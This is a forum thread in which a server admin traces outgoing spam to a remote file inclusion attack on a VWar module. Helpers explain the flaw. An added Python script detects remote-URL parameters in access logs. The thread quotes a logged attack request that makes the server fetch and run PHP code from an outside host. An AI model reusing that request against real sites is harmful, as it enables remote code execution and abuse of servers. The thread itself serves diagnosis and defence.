HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials


rayit 17th May 2006 08:30

spam from my server from account www-data?
 
Seems my server was listed on some spam filter sites..

I see a lot of messages in the mailq,
all starting with www-data@.....

How to prevent this, what is it???


thanks

Raymond
RayIT

After some googling something like this should be in the vhost file
to know which domain is giving the problem???

php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER@example.com"

maybe for future updates of ISPCONFIG??

Are there other solutions??

Biggest problem is I can not find the website which has the bad script??!!!

example:

May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<www-data@ns1.rayit.com>, size=4427, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<www-data@ns1.rayit.com>, size=4425, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<www-data@ns1.rayit.com>, size=4419, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<www-data@ns1.rayit.com>, size=4417, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<www-data@ns1.rayit.com>, size=4424, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<www-data@ns1.rayit.com>, size=4421, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<www-data@ns1.rayit.com>, size=4414, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)

falko 17th May 2006 15:09

Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...

rayit 17th May 2006 15:40

how do i know which web?
 
I can not find which web is causing the problem.

:eek:

falko 17th May 2006 16:09

You could check your Apache's access log.

rayit 17th May 2006 16:42

help...
 
can find nothing in the apache log files

maybe have a look?

http://www.rayit.com/syslog

and

http://www.rayit.com/ispconfig_access_log

please have a look for me...

rayit 17th May 2006 23:38

problem probably found
 
www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200]
"POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?
HTTP/1.1" 200 163464
"http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


Seems to be the problem, I think.

Norman 17th May 2006 23:50

Turn him off asap and ask user to resolve.

till 18th May 2006 08:30

I can only agree with Norman, turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the tip of the iceberg. The script seems to allow execution of external PHP code provided by a URL to the variable vwar_root.
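
For finding which vhost is affected, the check rayit ended up doing by hand can be scripted. The following is an added example, not part of the original thread: it scans access-log lines for query parameters whose value is itself a remote URL. The `vhost||||bytes||||` prefix is assumed from the single line quoted above; the sample lines, hostnames and parameter names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed layout, inferred from the line quoted in the thread:
#   vhost||||bytes||||<Apache combined log entry>
LINE_RE = re.compile(
    r'^(?P<vhost>[^|]+)\|\|\|\|\d+\|\|\|\|(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a URL is the remote-include signature.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_includes(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append({"vhost": m.group("vhost"), "ip": m.group("ip"),
                             "path": parts.path, "param": name,
                             "value": value, "status": int(m.group("status"))})
    return hits

# Constructed sample lines (documentation IPs, made-up hosts and parameters)
SAMPLE = [
    'www.site-a.example||||163464||||203.0.113.7 - - [17/May/2006:10:29:27 +0200] '
    '"POST /modules/app/admin.php?app_root=http://files.invalid/inc.txt? HTTP/1.1" '
    '200 163464 "-" "Mozilla/4.0"',
    'www.site-b.example||||5120||||198.51.100.4 - - [17/May/2006:10:30:02 +0200] '
    '"GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    'www.site-c.example||||300||||203.0.113.9 - - [17/May/2006:10:31:40 +0200] '
    '"GET /view.php?tpl=HTTP%3A%2F%2Ffiles.invalid%2Fx.txt HTTP/1.1" '
    '404 300 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for h in find_remote_includes(SAMPLE):
        print(h["vhost"], h["ip"], h["status"], h["path"], h["param"])
```

Legitimate redirect or callback parameters can also carry URLs, so treat hits as leads to review. A hit answered with status 200 and a large response, as in the thread, deserves attention first.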

rayit 18th May 2006 13:07

thanks
 
I chmod 000 the files and made user root
hopefully if user will update to newest release problems will be fixed..

Will point the webmaster of the site to

http://www.vwar.de/

various security leaks which could allow malicious users to include a (remote) file and eg. execute php commands on the server hosting vwar

thanks

Raymond
RayIT

dayjahone 15th March 2012 15:37

I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.

